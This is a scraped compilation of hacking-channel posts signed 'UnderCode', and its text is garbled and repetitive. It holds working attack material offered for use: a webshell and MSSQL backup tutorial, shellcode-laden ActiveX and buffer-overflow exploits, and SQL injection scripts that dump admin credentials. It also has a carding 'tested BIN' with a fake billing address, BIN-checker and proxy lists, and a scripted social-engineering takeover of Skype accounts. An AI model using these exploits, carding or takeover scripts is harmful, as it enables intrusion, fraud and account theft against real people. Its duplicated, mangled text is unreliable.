18) However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions. We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website. My personal experience is in the D, E, and F locations.

19) But what to do sometimes? We just upload a vbs file and save the following file as lookweb.vbs: On Error Resume Next If it fails, try another upload type. Sometimes we may not be able to get the WebShell of a website at all. At this time, we can use a marginal method to take a WebShell for a website that belongs to the same server, and then escalate the rights to the entire server.

20) The target website can be hacked. The above is the analysis of the ACCESS database and obtaining the webshell. Below, I analyze the MSSQL database. In the past, I also learned the solution of the ACCESS database. When I learned the MSSQL database, I found that I still do n’t understand a lot, so I took a lot of detours.

21) Now I summarize the method of the MSSQL database using the webshell. Friends who contacted webshell were helpful. First, we first check the user permissions of the MSSQL database. Generally, there are two types.

22) One is the SA (system admin) permission. This permission is very large. The other is the DB_OWNER permission. This permission is assigned to the user. Modify, delete, and add data tables to the database and execute most of the stored procedure permissions.

23) However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions.

24) We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website. My personal experience is in the D, E, and F locations. But what to do sometimes? We just upload a vbs file and save the following file as lookweb.vbs: On Error Resume Next The other is the DB_OWNER permission, which grants the user permission to modify, delete, and add new data tables to the database, and execute most stored procedures. However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions.

25) We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website. My personal experience is in the D, E, and F locations. But what to do sometimes? We just upload a vbs file and save the following file as lookweb.vbs: On Error Resume Next The other is the DB_OWNER permission, which grants the user permission to modify, delete, and add new data tables to the database, and execute most stored procedures.

26) However, the permissions related to some system-sensitive operations are not available, which is the only difference between it and SA permissions. We first look for the directory on the server where the website is located. You can use D to view the directory and find the directory of the website. My personal experience is in the D, E, and F locations.

27) But what to do sometimes? We just upload a vbs file, and save the following file as lookweb.vbs: On Error Resume Next
If (LCase (Right (WScript.Fullname, 11)) = "wscript.exe") Then
Msgbox Space (12) & "IIS Virtual Web Viewer" & Space (12) & Chr (13) & Space (9) & " Usage: Cscript vWeb.vbs ", 4096," Lilo "
WScript.Quit
End If
Set ObjService = GetObject (" IIS: // LocalHost / W3SVC ")
For Each obj3w In objservice
If IsNumeric (obj3w.Name) Then
Set OService = GetObject ("IIS: // LocalHost / W3SVC /" & obj3w.Name)
Set VDirObj = OService.GetObject ("IIsWebVirtualDir", "ROOT")
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr (10) & "[" & OService.ServerComment & "]"
For Each Binds In OService.ServerBindings
Web = "{" & Replace (Binds, ":", "} {") & "}"
WScript.Echo Replace (Split (Replace (Web, "", ""), "} {") (2), "}", "")
Next
WScript.Echo "Path:" & VDirObj.Path
End If
Next
　　
28) and then use NBSI to upload to the server, and then execute cscript X: \ lookweb.vbs, we can see this in the echo message The corresponding website on the server and its corresponding website directory are very convenient. Website directory at a glance. After finding the directory of the website, we can use the differential backup to obtain the webshell.

> where a is the password we want to connect to the Trojan.

29) We must pay attention to what type the MSSQL database is. The type is still digital. Fill in the corresponding place, the path is usually the directory of the website, such as "D: \ wwwroot \" write the database name after the backup, such as ri.asp; click "BackupShell" system to automatically back up the database. After the backup is successful, we will access the file we backed up, and it will be successful when the browser is garbled. We can use the one sentence link of lake2, please pay attention to the password. You can basically get the webshell here; It is also possible to directly find the website directory without uploading the difference, and upload the webshell file directly to the website directory.

30) The above are all written by undercode long-term practice and experience. It is completely original, whirring and exhausting me.

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 AFTER THIS TUTORIAL YOU ARE ABLE TO HACK ANY VIA WEBSHELL

🦑 Tested Bin Amazon Prime Video- Underc0de

548583xxxxxxxxxx
IP: Spain / Spain
Vpn: VyprVPN or the like
Mail: Gmail, Outlook, etc.
Address Line 1: Calle Reyes Catolicos
Population: Barcelona
State / Province / Region: Barcelona
Postal code: 11011
Country Spain
Telephone number: 300xxxxxxx (replace x with numbers)

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Terminal skills-:
twitter.com/undercodetc

1) Command: win + R win + D ctrl + P

2) Find “about” information and call IE. File, Open, C: \ WINDOWS \ system32 \ cmd.exe

3)XSS pop-up window calls IE. Such as <script> window.open (/ s /) </ script>

4) Text page, ctrl + P, printer.

5) Input method, virtual keyboard.

6) Press the four foot disorder may occur Start menu (in this order: left and right, lower left and right)

long press somewhere, will be out of the Properties dialog box

, double-click somewhere, there will be landing interface

7) deliberately enter the wrong does not meet the business logic Data, there is a certain probability to bypass

8) Find the picture, and then long press the picture. . The effect is equivalent to the right mouse button

in general, directly run the command line is almost impossible.

Flash pages, printers, and input methods are commonly used

@UnderCodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CVE - Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
fb.com/UnderCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>

🦑tested by undercode

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑This is PoC exploit-cve -sql
T.me/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

. this is PoC exploit
*/

$host = $argv[1];
$path = $argv[2];
$prefix = "qsf_"; // this is default prefix

echo
".\n ( Remote SQL Injection Exploit\n.\n".
". homepage: http://xy.wordpress.com/\n".
".\n".
". usage: php ".$argv[0]." host path\n".
". php ".$argv[0]." localhost /\n\n";

if(empty($host)||empty($path))die('# wrong host or path..');

$post_data = "query=I-like-it&forums[]=2)//limit//0//UNION//SELECT//1,1,concat(0x5b3a213a5d,user_name,0x3A,user_password,0x5b3a213a5d),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1//FROM//".$prefix."users//WHERE/**/user_group=1/*&searchtype=match&member_text=&member_select=exact&showposts_check=on&limit_check=on&limit_chars=400&time_check=on&time_way_select=newer&time_select=31&submit=Search";

$data = "POST ".$path."index.php?a=search HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "Content-Type: application/x-www-undercodetest-urlencoded\r\n";
$data .= "Content-length: ".strlen($post_data)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $post_data."\r\n\r\n";

$s = @fsockopen($host, 80);
if (empty($s)) die('# wrong host..');

fputs($s, $data); $retu ='';

while(!feof($s)){
$retu .= fgets($s);
}

fclose($s);

$tmp = explode('[:!:]',$retu);
if(empty($tmp[1]))die('sorry, exploit failed.. maybe try again in a few seconds..');
echo " " . $tmp[1] . "\n\ndone.";
?>
@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Some good bin checkers websites:

> https://www.bincodes.com/bin-checker/

> https://binlist.net/

>https://binchecker.com/

>https://ccbins.pro/

>https://bin-checker.net/

>https://bincheck.org/

🦑Popular & recommended one
@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 someone ask, How to Easily Master Format SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Safety Hard Reset?
if fond this gd article as a solution :
twitter.com/UndercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

A) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Software Menu:

1) Make sure the battery is charge properly

2) Turn on SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) smartphone

3) Don’t forget to backup all important data

4) Go to menu: Setting > Backup & reset > Factory Data Reset > Reset Phone

5) Choose Erase everything to continue and confirm you ready to do the format SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)

6) The SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) will continue the step until ready to use in clean factory default.

B) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Flashtool applications:

1) Flashtool in the applications from Sony can be download from Sony website.

2) Flashtool software need to installed in you computer and ready with USB data cable

3) Make sure SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) battery is charge properly or full charge

4) Power off SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)

5) Boot SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) to

6) flashmode with using: Volume Down Button and connect to USB cable at No.1 above

7) Follow the menu at you computer display, it is easy to understand the steps.

C) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with Hardware Key Button:

1) Make sure the battery fully charge

2) Do not forget to backup all important data

3) Turn off the SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)

4) Press and Hold together: Power Button + Volume Up Button for several seconds

5) Follow the menu at LCD screen to continue the hard reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE)

D) Hard Reset SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) with PC Companion Software from Computer

1) Please Make Sure the Battery not Empty

2) PC Companion is default applications for Sony Smartphone which can be download from Sony Website

3) After install at our computer, open PC Companion Applications
Before connect to phone, please choose Phone Update and follow several step at PC Companion

4) At some menu, PC Companion will tell us how to connect the phone with PC Companion using USB cable and press the Volume Down button

5) Finish the PC Companion step and until it doing Factory Reset to SONY XPERIA SP (C5302/M35H) & (C5303/C5306 LTE) to factory default Android operating system.

@undercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The most classic hacking tutorial (security skills) by UnderCode :
t.me/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

The behavior of hackers mainly includes the following :

1) Learning technology:
　　Once new technologies appear on the Internet, hackers must learn immediately and master the technology in the shortest time. The mastering here is not general understanding, but Read the relevant "RFC" and understand the mechanism of this technology. Otherwise, if you stop learning, then relying on what he has previously mastered, you will not be able to maintain his "hacker status" for more than a year.

　　The knowledge that junior hackers need to learn is more difficult, because they have no foundation, so they need to be exposed to a lot of basic content. However, today's Internet brings a lot of information to readers, which requires junior learners to choose: too Deep content may make learning difficult; too "fancy" content is not useful for learning hackers. Therefore, beginners should not be too greedy, they should try to find a book and their own complete textbooks, and study them step by step.

2) Masquerade:
　　Every act of a hacker will be recorded by the server, so the hacker must disguise himself so that the other party cannot distinguish his true identity. This requires skilled skills to masquerade his IP address, use springboards to evade tracking, and clean up records Disturb clues, avoid firewalls, and more.

　　Camouflage requires very good basic skills to achieve it. This is a "big game" for beginners, which means that it is impossible for beginners to learn camouflage in a short time, so I do not encourage beginners to use their own learning Knowledge attacks the network, otherwise, once your actions are revealed, you will eventually harm yourself.

　　If one day you become a real hacker, I also don't approve of your attack on the network. After all, the growth of a hacker is a learning, not a crime.

3) Vulnerability discovery:
　　Vulnerabilities are the most important information for hackers. Hackers must often learn from other people's discovered vulnerabilities, and strive to find unknown vulnerabilities by themselves, and find valuable and exploitable vulnerabilities from a large number of vulnerabilities for testing. , Of course, their ultimate goal is to destroy or patch this vulnerability through a vulnerability.

>　Hackers ’obsession with finding vulnerabilities is unthinkable. Their slogan says" break authority ". From time to time, hackers have proved this with their actual actions. There is no" no Vulnerable "program. In the eyes of a hacker, the so-called "seamless" is simply "not found".

4) Exploiting loopholes:
　　For decent hackers, the loopholes need to be patched; for evil hackers, the loopholes are used for sabotage. And their basic premise is to "exploit vulnerabilities". Hackers can use vulnerabilities to do the following things:
　　
1) Obtain system information: Some vulnerabilities can leak system information and expose sensitive information, thereby further invading the system;
　　
2) Invading the system: entering through vulnerabilities Inside the system, or get the internal data on the server, or completely control the server;
　　
3) Find the next target: A victory means the emergence of the next target, and a hacker should make full use of the server that he already controls as a tool to find and invade the next System;
　　
4) Do some good things: After the decent hackers finish the above work, they will fix the vulnerabilities or notify the system administrator to
　　do some things to maintain network security; 5. Do some bad things: the evil hackers are doing the above work Later, it will be judged whether the server still has utilization value. If there is use value, they will implant Trojans or backdoors on the server for the next visit; and they will never show mercy to servers that have no use value, and the system crash will make them feel unlimited pleasure!

@UnderCodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to become a hacker ? the basic skills that hackers should master by undercode :
pinterest.com/UnderCodeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

🦑 From this section, we have really embarked on the road of learning hackers. The first thing to introduce is the basic skills that must be mastered as a junior hacker. Learning this can be done through this The section reads that hackers are not mysterious, and they are easy to learn. In order to ensure that beginners are interested in hackers, this book adopts a cyclical progress, which means that the content of each chapter is independent and comprehensive. Learners can learn only after studying a chapter completely. In the next chapter.

A) 1) Learn a certain amount of English:
　　Learning English is very important for hackers, because most of the materials and tutorials are now in English, and news about hackers also comes from abroad. A vulnerability needs to be discovered from the introduction in Chinese. For about a week, the network administrator has enough time to patch the vulnerability during this time, so when we see the introduction in Chinese, this vulnerability may have long ceased to exist. Therefore, learning hackers must try to read English materials, use English software, and pay attention to well-known foreign network security websites in time.

2) Learn to use basic software:
　　The basic software mentioned here refers to two contents: one is the various commands commonly used by computers on our daily lives, such as ftp, ping, net, etc .; on the other hand, we must learn about hacking tools. Use, which mainly includes port scanners, vulnerability scanners, information interception tools and password cracking tools. Because these softwares have many varieties and different functions, this book will introduce several popular software usage methods later. After mastering the basic principles, learners can choose the ones that are suitable for them or can be found in the second part. "To find software development guidelines and write your own hacking tools.

3) Preliminary understanding of network protocols and working principles: The
　　so-called "initial understanding" is to understand the working principles of the network "in accordance with your own understanding method". Because the protocol involves a lot of knowledge and complexity, if you conduct in-depth research at the beginning, it is bound to Will greatly discourage enthusiasm for learning. Here I suggest that learners get a preliminary understanding of the TCP / IP protocol, especially how the network transmits information when browsing the web, how the client browser applies for "handshake information", how the server "responds to handshake information" and "accepts the request" And other content, this part of the content will be described in detail in later chapters.

4) Familiar with several popular programming languages ​​and scripts:
　　As mentioned above, learners are not required to study in depth here, as long as they can understand the relevant languages ​​and know the results of program execution. It is recommended that learners learn the C language, asp, and cgi scripting languages ​​Initially, and have a basic understanding of the htm hypertext language and php, java, etc., mainly study the "variable" and "array" parts of these languages, because there is an inherent relationship between languages ​​Contact, so long as you are proficient in one of them, other languages ​​can be the same, it is recommended to learn C language and htm hypertext language.

B) 1) Familiar with network applications:
　　Network applications include various server software background programs, such as wuftp, Apache and other server backgrounds; there are various online forums and electronic communities. Conditional learners are better off making their own computers into servers, and then installing and running some forum code. After some experimentation, they will perceptually understand the working principle of the network, which is much easier than relying on theoretical learning. Do more with less!

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑hacking skype tutorial by UnderCode :
fb.com/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>Mental faculties

>Skype

>Quick-thinking

>Social Skills (Minimum hard work required)

🦑 Process

1) The very first thing you'll want to complete is usually collect the essential info; rather as much as you may get of the bank account anyone are trying to acquire control of. Your proposed info You might want to acquire previous to trying to take this Skype is usually;

2) Full name of the particular person
Documented E-Mail tackle to this Skype
Almost any repayment techniques employed
Sign up date of the Skype
5 acquaintances about the individuals Skype record
Region those is usually coming from
Any E-Mail address that have been listed on the bank account

3) The key bullet-points that you need tend to be; Label, E-mail, Repayment Process in addition to Sign up date that you can generally get away with just by while using calendar year in addition to 5 acquaintances about the individuals Skype record; these include the typical concerns you're inquired to start with although in the event you find some of all of them drastically wrong they are going to preceed to consult anyone the country found in subscription in addition to every other E-Mail address of this particular bank account.

4) Properly contemplating you recognize the title of the particular person or the E-Mail you possibly can simply state any Skype with your two key waste info, generally the repayment process isn't repayment employed if you do not know normally plus the call record talks regarding itself; issues held it's place in a bunch call up subsequently there exists a excellent possibility that person has some of hte people in it on the call record.

5) Right now you could have obtained the details needed, it truly is time and energy to place our own preparing in to steps, at once to the site;

🦑6) web page link

Purely get into the login name of the Skype plus the title of your personnel. Right now I'll provide you with a transcript of how the chat will in all probability proceed, basically abide by my recommendations and will also be productive if your entire info is usually proper. Best of luck.

7) Transcript

Daring = Skype |Italics = Me personally

“Hi I have ignored my private data regarding my Skype bank account! ”

“Oh, My partner and i see. I’d always be satisfied to assist you with that, May possibly I have your own Skype Label in addition to first title, make sure you? ”

“My Skype title is usually ‘bob’ in addition to la and orange county bob”

“Thank anyone.

🦑 So that you can assist you We need you to definitely supply the using details:

1) Exactly how does anyone spend? Prior repayment process
2) Precisely what is the e-mail tackle anyone provided from subscription?
3) While does anyone create your own Skype bank account (month/year)
some. Provide us the titles of 5 good friends as part of your acquaintances list”

1) “ Never ever settled
2) bob@bob. joe
3) 1/2 calendar year previously
some. Bob1, bob2, bob3, bob4, bob5”

“Thank anyone. You need to furthermore solution:
1) What title does anyone provide from subscription (first + last)
2) What land does you ultimately choose while in subscription?
3) Provide us virtually any previous email address contact info you may have employed? ”

“Sure,
1) Robert Chad
2) Great britain
3) Merely bob@bob. joe as i recall”

“Thank anyone make sure you reset to zero your own private data in this article; link”

“I don’t have access to in which mail any longer that’s exactly why I’m getting in contact with you”

“What can be your new email address contact info? ”

“It’s Bob@bobber. bob”

“Thank anyone. I have at this point improved your own email address contact info, possibly there is anything else My partner and i will let you with currently? ”

“Thanks greatly, Zero that’s alright l8rs: )”

Transcript Conclude

Right now this can seem to be a good practice nonetheless it isn't and yes it generally builds up an actual individual interconnection concerning anyone plus the particular person you're talking too, with good signals, good grammar in addition to using recommendations meticulously there is certainly virtually any 99% potential for anyone having this.

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 deadly cve IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
twitter.com/UndercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.

Based on exploit by Koshi (written in Perl). This one should be more
stable. Just for fun and to learn more about win32 exploitation.

by Wojciech Pawlikowski (wojtekp@gmail.com)
/

#include <sys/types.h>
#include <sys/socket.h>

#include <arpa/inet.h>
#include <netinet/in.h>

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 1550
#define NOP 0x90
#define RETADDR 0x7c941EED // jmp esp ntdll.dll

/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */

unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x41\x41\x52\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x6d\x39\x59\x6c\x69"
"\x78\x41\x54\x75\x50\x77\x70\x45\x50\x6c\x4b\x73\x75\x55\x6c\x4e"
"\x6b\x61\x6c\x33\x35\x54\x38\x55\x51\x7a\x4f\x4c\x4b\x70\x4f\x45"
"\x48\x4c\x4b\x33\x6f\x67\x50\x45\x51\x4a\x4b\x43\x79\x6c\x4b\x34"
"\x74\x4c\x4b\x47\x71\x6a\x4e\x64\x71\x6f\x30\x5a\x39\x6e\x4c\x4e"
"\x64\x4f\x30\x30\x74\x45\x57\x79\x51\x6b\x7a\x74\x4d\x37\x71\x5a"
"\x62\x4a\x4b\x5a\x54\x55\x6b\x31\x44\x71\x34\x55\x54\x71\x65\x4b"
"\x55\x6c\x4b\x73\x6f\x61\x34\x45\x51\x78\x6b\x65\x36\x6c\x4b\x36"
"\x6c\x50\x4b\x4e\x6b\x71\x4f\x57\x6c\x35\x51\x38\x6b\x4c\x4b\x77"
"\x6c\x6e\x6b\x77\x71\x6a\x4b\x4c\x49\x71\x4c\x37\x54\x34\x44\x7a"
"\x63\x54\x71\x39\x50\x61\x74\x6c\x4b\x43\x70\x46\x50\x4b\x35\x49"
"\x50\x72\x58\x46\x6c\x6c\x4b\x47\x30\x36\x6c\x6c\x4b\x70\x70\x37"
"\x6c\x4e\x4d\x4c\x4b\x65\x38\x46\x68\x7a\x4b\x64\x49\x4e\x6b\x4f"
"\x70\x6e\x50\x77\x70\x77\x70\x45\x50\x6c\x4b\x70\x68\x37\x4c\x63"
"\x6f\x64\x71\x49\x66\x73\x50\x31\x46\x6e\x69\x59\x68\x4b\x33\x69"
"\x50\x51\x6b\x30\x50\x32\x48\x5a\x4f\x5a\x6e\x69\x70\x45\x30\x33"
"\x58\x4c\x58\x6b\x4e\x4c\x4a\x76\x6e\x66\x37\x6b\x4f\x7a\x47\x30"
"\x6d\x53\x43\x62\x50\x53\x51\x73\x59\x32\x4e\x33\x44\x45\x50\x42";

int
main(void)
{
struct sockaddr_in serv_sin, cli_sin;
int i, sockfd, cli_sock, sock_opt = 1, sin_len;
char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE 100] = { 0 };

sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockfd < 0)
{
perror("socket()");
exit(-1);
}

serv_sin.sin_family = AF_INET;
serv_sin.sin_port = htons(80);
serv_sin.sin_addr.s_addr = INADDR_ANY;

if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
{
perror("setsockopt()");
close(sockfd);
exit(-1);
}

if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
{
perror("bind()");
close(sockfd);
exit(-1);
}

listen(sockfd, 1);
sin_len = sizeof(struct sockaddr);

printf("[*] Waiting for a connection...\n");

while (1)
{
cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
if (cli_sock < 0)
{
perror("accept()");
exit(-1);
}

printf("[ ] Connection from %s:%d\n", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));

read(cli_sock, buf, sizeof(buf) - 1);
overflow = (char *)malloc(BUFSIZE 1);

for (i = 0; i <= 1540; i = 4)
*(long *)&overflow[i] = RETADDR;

for (i = 0; i < 1536; i )
overflow[i] = NOP;

memcpy(overflow 550, shellcode, strlen(shellcode));
memcpy(overflow i 4, "\xe9\x14\xfc\xff\xff", 5); // jmp -1000 - jump to our buffer

i = sprintf(req, "200 HTTP/1.1\r\nDate: 2008-07-24 20:14:31\r\nLocation: ");
memcpy(req i, overflow, strlen(overflow));
memcpy(req i strlen(overflow), "\r\n\r\n", 4);

write(cli_sock, req, strlen(req));

printf("[ ] Exploit sent!\n");

close(cli_sock);
}

close(sockfd);
}

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
pinterest.com/undercodeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';

var body1='"></OBJECT>';

var buf='';
for (i=1;i<=1945;i ){buf=buf unescape(" ");}


document.write(body buf body1);

Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Best http proxy list sites:

http://www.proxyserverlist24.top/?m=1

http://www.httptunnel.ge/ProxyListForFree/aspx

http://spys.one/en/http-proxy-list/

https://hidemyna.me/en/proxy-list/

https proxy list sites :

http://free-proxy.cz/fr/

https://www.proxynova.com/proxy-server-list/port-8080/

sock 4+5 proxy sites:

http://www.socksproxylist24.top/?m=

https://www.socks-proxy.net

https://sockslist.net

http://spys.one/en/socks-proxy-list/

http://www.gatherproxy.com/sockslist

https://www.sslproxies.org/

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
twitter.com/UndercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

#!/usr/bin/perl use IO::Socket;
print q{
-----------------------------------------------
Arctic Issue Tracker v2.0.0 exploit by ldma
~ SubCode ~
use: arctic.pl [server] [dir]
sample:
$perl arctic.pl localhost /arctic/
----------------------------------------------- }; $webpage = $ARGV[0];
$directory = $ARGV[1];
print " -initiating\n";
print "|--modules..OK!\n";
sleep 1;
print "|--premodules..OK!\n";
sleep 1;
print "|--preprocessors..OK!\n";
sleep 1;
print " -opening channel.. OK!\n";
sleep 2;
print "--------------------------------------------\n";
print "~ configuration complete.. OK!\n";
print "~ scanning";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
if (!$webpage) { die "\ rtfm geek\n"; } $wbb_dir =
"http://".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--"; print "~ connecting";
$|=1;
foreach (1..1) {
print ".";
sleep 1;
}
print " OK!\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Server\n"; print "~ open exploiting-tree";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";
print "[ ] Target: $webpage\n";
while ($answer = <$sock>) {
if ($answer =~ /Current Filter: <strong>(.*)<\/strong>/) {
print "exploiting in progress";
$|=1;
foreach (1..3) {
print "...";
sleep 1;
}
print "OK!\n[ ] vuln: OK!\n\n\nwell done, ldma!\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "[ ] USER-ID: -1\n";
print "[ ] ID-HASH: $1\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
exit();
}
} close($sock); # ldma

🦑TESTED BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁